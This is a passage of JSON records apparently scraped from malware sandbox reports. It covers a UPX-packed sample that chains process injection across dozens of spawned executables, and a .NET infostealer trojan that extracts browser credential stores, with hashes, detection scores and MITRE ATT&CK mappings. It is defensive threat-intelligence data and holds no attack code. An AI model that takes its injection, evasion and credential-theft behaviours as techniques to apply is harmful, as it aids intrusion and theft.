compressed\"- Location: [C:\\0600220.exe]- [targetUID: 00000000-00003448]\n \"6040442.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6040442.exe]- [targetUID: 00000000-00002732]\n \"682244.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\682244.exe]- [targetUID: 00000000-00003668]\n \"jxtxdv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jxtxdv.exe]- [targetUID: 00000000-00003668]\n \"jpdvr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jpdvr.exe]- [targetUID: 00000000-00002896]\n \"vnjvhvr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vnjvhvr.exe]- [targetUID: 00000000-00002380]\n \"pfffth.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pfffth.exe]- [targetUID: 00000000-00002380]\n \"xlfpx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xlfpx.exe]- [targetUID: 00000000-00002960]\n \"64660.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64660.exe]- [targetUID: 00000000-00005560]\n \"8224062.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8224062.exe]- [targetUID: 00000000-00005560]\n \"btvxfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\btvxfh.exe]- [targetUID: 00000000-00005976]\n \"dnppt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dnppt.exe]- [targetUID: 00000000-00006120]\n \"vdfxt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vdfxt.exe]- [targetUID: 00000000-00002612]\n \"trdvh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\trdvh.exe]- [targetUID: 00000000-00002612]\n \"jbdbn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jbdbn.exe]- [targetUID: 00000000-00004224]\n \"rbldl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rbldl.exe]- [targetUID: 00000000-00004224]\n \"62242.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\62242.exe]- [targetUID: 00000000-00006088]\n \"68282.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\68282.exe]- [targetUID: 00000000-00004308]\n \"xlbdxlx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xlbdxlx.exe]- [targetUID: 00000000-00004308]\n \"nrdvp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nrdvp.exe]- [targetUID: 00000000-00005988]\n \"bbhhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bbhhn.exe]- [targetUID: 00000000-00005876]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e\" has a section named \"UPX0\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e\" has a section named \"UPX1\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e\" has a section named \"UPX2\"\n \"bphvxnd.exe\" has a section named \"UPX0\"\n \"bphvxnd.exe\" has a section named \"UPX1\"\n \"bphvxnd.exe\" has a section named \"UPX2\"\n \"ndjtrh.exe\" has a section named \"UPX0\"\n \"ndjtrh.exe\" has a section named \"UPX1\"\n \"ndjtrh.exe\" has a section named \"UPX2\"\n \"lhfrhnr.exe\" has a section named \"UPX0\"\n \"lhfrhnr.exe\" has a section named \"UPX1\"\n \"lhfrhnr.exe\" has a section named \"UPX2\"\n \"482064.exe\" has a section named \"UPX0\"\n \"482064.exe\" has a section named \"UPX1\"\n \"482064.exe\" has a section named \"UPX2\"\n \"202048.exe\" has a section named \"UPX0\"\n \"202048.exe\" has a section named \"UPX1\"\n \"202048.exe\" has a section named \"UPX2\"\n \"48866.exe\" has a section named \"UPX0\"\n \"48866.exe\" has a section named \"UPX1\"\n \"48866.exe\" has a section named \"UPX2\"\n \"hrffr.exe\" has a section named \"UPX0\"\n \"hrffr.exe\" has a section named \"UPX1\"\n \"hrffr.exe\" has a section named \"UPX2\"\n \"nfbjp.exe\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e\" has section name UPX1 with entropy \"7.97244478673\"\n \"bphvxnd.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"ndjtrh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"lhfrhnr.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"482064.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"202048.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"48866.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"hrffr.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"nfbjp.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"6064442.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"44424.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"pdjrtdv.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"bvffnn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"fplrrnr.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"lrnlbrl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"0086084.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"22004.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"4688248.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"0288086.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"vvtbdn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"dbhlfn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"ptxnnrh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"xxfflb.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"44680.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"0024648.exe\" has section name UPX1 with entropy \"7.97244478673\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" (UID: 00000000-00005880)\n Spawned process \"bbhhn.exe\" (UID: 00000000-00005876)\n Spawned process \"nrdvp.exe\" (UID: 00000000-00005988)\n Spawned process \"xlbdxlx.exe\" (UID: 00000000-00004308)\n Spawned process \"68282.exe\" (UID: 00000000-00006088)\n Spawned process \"62242.exe\" (UID: 00000000-00005996)\n Spawned process \"rbldl.exe\" (UID: 00000000-00004224)\n Spawned process \"jbdbn.exe\" (UID: 00000000-00006112)\n Spawned process \"trdvh.exe\" (UID: 00000000-00002612)\n Spawned process \"vdfxt.exe\" (UID: 00000000-00006120)\n Spawned process \"dnppt.exe\" (UID: 00000000-00004300)\n Spawned process \"btvxfh.exe\" (UID: 00000000-00005976)\n Spawned process \"8224062.exe\" (UID: 00000000-00005560)\n Spawned process \"64660.exe\" (UID: 00000000-00004376)\n Spawned process \"xlfpx.exe\" (UID: 00000000-00002960)\n Spawned process \"pfffth.exe\" (UID: 00000000-00002380)\n Spawned process \"vnjvhvr.exe\" (UID: 00000000-00001460)\n Spawned process \"jpdvr.exe\" (UID: 00000000-00002896)\n Spawned process \"jxtxdv.exe\" (UID: 00000000-00003668)\n Spawned process \"682244.exe\" (UID: 00000000-00002824)\n Spawned process \"6040442.exe\" (UID: 00000000-00002732)\n Spawned process \"0600220.exe\" (UID: 00000000-00003448)\n Spawned process \"2262446.exe\" (UID: 00000000-00003728)\n Spawned process \"266028.exe\" (UID: 00000000-00004404)\n Spawned process \"0600240.exe\" (UID: 00000000-00001256)\n Spawned process \"8064042.exe\" (UID: 00000000-00004408)\n Spawned process \"hppjr.exe\" (UID: 00000000-00004420)\n Spawned process \"jjxfht.exe\" (UID: 00000000-00003224)\n Spawned process \"fvnph.exe\" (UID: 00000000-00004268)\n Spawned process \"60486.exe\" (UID: 00000000-00002696)\n Spawned process \"42600.exe\" (UID: 00000000-00000976)\n Spawned process \"40806.exe\" (UID: 00000000-00004264)\n Spawned process \"4866828.exe\" (UID: 00000000-00002712)\n Spawned process \"62046.exe\" (UID: 00000000-00000332)\n Spawned process \"pdhnvj.exe\" (UID: 00000000-00003460)\n Spawned process \"tjxjxxh.exe\" (UID: 00000000-00004084)\n Spawned process \"rnftf.exe\" (UID: 00000000-00003804)\n Spawned process \"nvfdf.exe\" (UID: 00000000-00003180)\n Spawned process \"vhrdph.exe\" (UID: 00000000-00004456)\n Spawned process \"88806.exe\" (UID: 00000000-00003176)\n Spawned process \"8446060.exe\" (UID: 00000000-00003164)\n Spawned process \"868648.exe\" (UID: 00000000-00001768)\n Spawned process \"464220.exe\" (UID: 00000000-00001240)\n Spawned process \"42442.exe\" (UID: 00000000-00000132)\n Spawned process \"0802042.exe\" (UID: 00000000-00000904)\n Spawned process \"rttxj.exe\" (UID: 00000000-00001000)\n Spawned process \"fdfnr.exe\" (UID: 00000000-00000396)\n Spawned process \"trlhh.exe\" (UID: 00000000-00001472)\n Spawned process \"ntjjnl.exe\" (UID: 00000000-00003752)\n Spawned process \"ldpdlv.exe\" (UID: 00000000-00003012)\n Spawned process \"848066.exe\" (UID: 00000000-00002528)\n Spawned process \"0024648.exe\" (UID: 00000000-00002064)\n Spawned process \"44680.exe\" (UID: 00000000-00002812)\n Spawned process \"xxfflb.exe\" (UID: 00000000-00002520)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" wrote 32 bytes to a remote process \"C:\\bbhhn.exe\" (Handle: 116)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" wrote 52 bytes to a remote process \"C:\\bbhhn.exe\" (Handle: 116)\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" wrote 4 bytes to a remote process \"C:\\bbhhn.exe\" (Handle: 116)\n \"bbhhn.exe\" wrote 32 bytes to a remote process \"C:\\nrdvp.exe\" (Handle: 64)\n \"bbhhn.exe\" wrote 52 bytes to a remote process \"C:\\nrdvp.exe\" (Handle: 64)\n \"bbhhn.exe\" wrote 4 bytes to a remote process \"C:\\nrdvp.exe\" (Handle: 64)\n \"nrdvp.exe\" wrote 32 bytes to a remote process \"C:\\xlbdxlx.exe\" (Handle: 120)\n \"nrdvp.exe\" wrote 52 bytes to a remote process \"C:\\xlbdxlx.exe\" (Handle: 120)\n \"nrdvp.exe\" wrote 4 bytes to a remote process \"C:\\xlbdxlx.exe\" (Handle: 120)\n \"xlbdxlx.exe\" wrote 32 bytes to a remote process \"C:\\68282.exe\" (Handle: 80)\n \"xlbdxlx.exe\" wrote 52 bytes to a remote process \"C:\\68282.exe\" (Handle: 80)\n \"xlbdxlx.exe\" wrote 4 bytes to a remote process \"C:\\68282.exe\" (Handle: 80)\n \"68282.exe\" wrote 32 bytes to a remote process \"C:\\62242.exe\" (Handle: 68)\n \"68282.exe\" wrote 52 bytes to a remote process \"C:\\62242.exe\" (Handle: 68)\n \"68282.exe\" wrote 4 bytes to a remote process \"C:\\62242.exe\" (Handle: 68)\n \"62242.exe\" wrote 32 bytes to a remote process \"C:\\rbldl.exe\" (Handle: 68)\n \"62242.exe\" wrote 52 bytes to a remote process \"C:\\rbldl.exe\" (Handle: 68)\n \"62242.exe\" wrote 4 bytes to a remote process \"C:\\rbldl.exe\" (Handle: 68)\n \"rbldl.exe\" wrote 32 bytes to a remote process \"C:\\jbdbn.exe\" (Handle: 68)\n \"rbldl.exe\" wrote 52 bytes to a remote process \"C:\\jbdbn.exe\" (Handle: 68)\n \"rbldl.exe\" wrote 4 bytes to a remote process \"C:\\jbdbn.exe\" (Handle: 68)\n \"jbdbn.exe\" wrote 32 bytes to a remote process \"C:\\trdvh.exe\" (Handle: 116)\n \"jbdbn.exe\" wrote 52 bytes to a remote process \"C:\\trdvh.exe\" (Handle: 116)\n \"jbdbn.exe\" wrote 4 bytes to a remote process \"C:\\trdvh.exe\" (Handle: 116)\n \"trdvh.exe\" wrote 32 bytes to a remote process \"C:\\vdfxt.exe\" (Handle: 116)\n \"trdvh.exe\" wrote 52 bytes to a remote process \"C:\\vdfxt.exe\" (Handle: 116)\n \"trdvh.exe\" wrote 4 bytes to a remote process \"C:\\vdfxt.exe\" (Handle: 116)\n \"vdfxt.exe\" wrote 32 bytes to a remote process \"C:\\dnppt.exe\" (Handle: 116)\n \"vdfxt.exe\" wrote 52 bytes to a remote process \"C:\\dnppt.exe\" (Handle: 116)\n \"vdfxt.exe\" wrote 4 bytes to a remote process \"C:\\dnppt.exe\" (Handle: 116)\n \"dnppt.exe\" wrote 32 bytes to a remote process \"C:\\btvxfh.exe\" (Handle: 68)\n \"dnppt.exe\" wrote 52 bytes to a remote process \"C:\\btvxfh.exe\" (Handle: 68)\n \"dnppt.exe\" wrote 4 bytes to a remote process \"C:\\btvxfh.exe\" (Handle: 68)\n \"btvxfh.exe\" wrote 32 bytes to a remote process \"C:\\8224062.exe\" (Handle: 68)\n \"btvxfh.exe\" wrote 52 bytes to a remote process \"C:\\8224062.exe\" (Handle: 68)\n \"btvxfh.exe\" wrote 4 bytes to a remote process \"C:\\8224062.exe\" (Handle: 68)\n \"8224062.exe\" wrote 32 bytes to a remote process \"C:\\64660.exe\" (Handle: 68)\n \"8224062.exe\" wrote 52 bytes to a remote process \"C:\\64660.exe\" (Handle: 68)\n \"8224062.exe\" wrote 4 bytes to a remote process \"C:\\64660.exe\" (Handle: 68)\n \"64660.exe\" wrote 32 bytes to a remote process \"C:\\xlfpx.exe\" (Handle: 68)\n \"64660.exe\" wrote 52 bytes to a remote process \"C:\\xlfpx.exe\" (Handle: 68)\n \"64660.exe\" wrote 4 bytes to a remote process \"C:\\xlfpx.exe\" (Handle: 68)\n \"xlfpx.exe\" wrote 32 bytes to a remote process \"C:\\pfffth.exe\" (Handle: 68)\n \"xlfpx.exe\" wrote 52 bytes to a remote process \"C:\\pfffth.exe\" (Handle: 68)\n \"xlfpx.exe\" wrote 4 bytes to a remote process \"C:\\pfffth.exe\" (Handle: 68)\n \"pfffth.exe\" wrote 32 bytes to a remote process \"C:\\vnjvhvr.exe\" (Handle: 68)\n \"pfffth.exe\" wrote 52 bytes to a remote process \"C:\\vnjvhvr.exe\" (Handle: 68)\n \"pfffth.exe\" wrote 4 bytes to a remote process \"C:\\vnjvhvr.exe\" (Handle: 68)\n \"vnjvhvr.exe\" wrote 32 bytes to a remote process \"C:\\jpdvr.exe\" (Handle: 116)\n \"vnjvhvr.exe\" wrote 52 bytes to a remote process \"C:\\jpdvr.exe\" (Handle: 116)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229
https://hybrid-analysis.com/sample/cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229
Hybrid Analysis - Infostealers
{"size": 310784, "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229", "sha256": "cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229", "av_detect": 89, "vx_family": "Trojan.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 182, "extracted_files": [{"name": "Amazon_Downloader_Log_20171206-225712_1810e9e0-1a8d-457c-be3a-737de50dc6bb.txt", "file_path": "%ALLUSERSPROFILE%\\44\\Files\\Amazon Downloader Logs\\Amazon_Downloader_Log_20171206-225712_1810e9e0-1a8d-457c-be3a-737de50dc6bb.txt", "file_size": 9779, "sha256": "d91e1c82706b8b448f9162776543d6c9956762aeb546de103a09f0a8d818c11e", "type_tags": ["text"], "description": "ASCII text", "runtime_process": "cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe (PID: 5916)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "key3.db", "file_path": "%PUBLIC%\\g4h7miqt.default\\key3.db", "file_size": 16384, "sha256": "08fbda1a1a349b117701200ef9e3e157fde326516c42a0133ce474b4f9672323", "type_tags": ["unknown"], "description": "Berkeley DB 1.85 (Hash, version 2, native byte-order)", "runtime_process": "cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe (PID: 5916)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tmpD1C0.tmp.dat", "file_path": "%TEMP%\\tmpD1C0.tmp.dat", "file_size": 102400, "sha256": "c2fe0cb3ed111dfea76b1ed24e7cd004b2f52acda9d6acf74f0c2337c2d833a3", "type_tags": ["data"], "description": "SQLite 3.x database, last written using SQLite version 3039004, page size 2048, file counter 2, database pages 50, cookie 0x22, schema 4, UTF-8, version-valid-for 2", "runtime_process": "cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe (PID: 5916)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tmpD460.tmp.dat", "file_path": "%TEMP%\\tmpD460.tmp.dat", "file_size": 47104, "sha256": "522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9", "type_tags": ["data"], "description": "SQLite 3.x database, last written using SQLite version 3039004, page size 2048, file counter 1, database pages 23, cookie 0xd, schema 4, UTF-8, version-valid-for 1", "runtime_process": "cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe (PID: 5916)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tmpD471.tmp.dat", "file_path": "%TEMP%\\tmpD471.tmp.dat", "file_size": 102400, "sha256": "c2fe0cb3ed111dfea76b1ed24e7cd004b2f52acda9d6acf74f0c2337c2d833a3", "type_tags": ["data"], "description": "SQLite 3.x database, last written using SQLite version 3039004, page size 2048, file counter 2, database pages 50, cookie 0x22, schema 4, UTF-8, version-valid-for 2", "runtime_process": "cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe (PID: 5916)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tmpD52D.tmp.tmpdb", "file_path": "%TEMP%\\tmpD52D.tmp.tmpdb", "file_size": 524288, "sha256": "c4c49e874abd38b83cb8eefe46d05d21dfc3502a69a59fb672316a50b04462c7", "type_tags": ["data"], "description": "SQLite 3.x database, user version 8, last written using SQLite version 3020001, page size 32768, writer version 2, read version 2, file counter 4, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 4", "runtime_process": "cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe (PID: 5916)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": [], "imported_objects": [], "file_analysis": [], "total_file_compositions_imports": null}, "processes": [{"uid": "00000000-00005916", "name": "cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe", "normalized_path": "C:\\cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229.exe", "sha256": "cc7d38cdc5f43a9a157d4c71445a4f4bd46d47e4221113886a9e8d2b50c76229"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 4, "informative_identifiers_count": 9}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Compile After Delivery", "attck_id": "T1027.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/004", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", 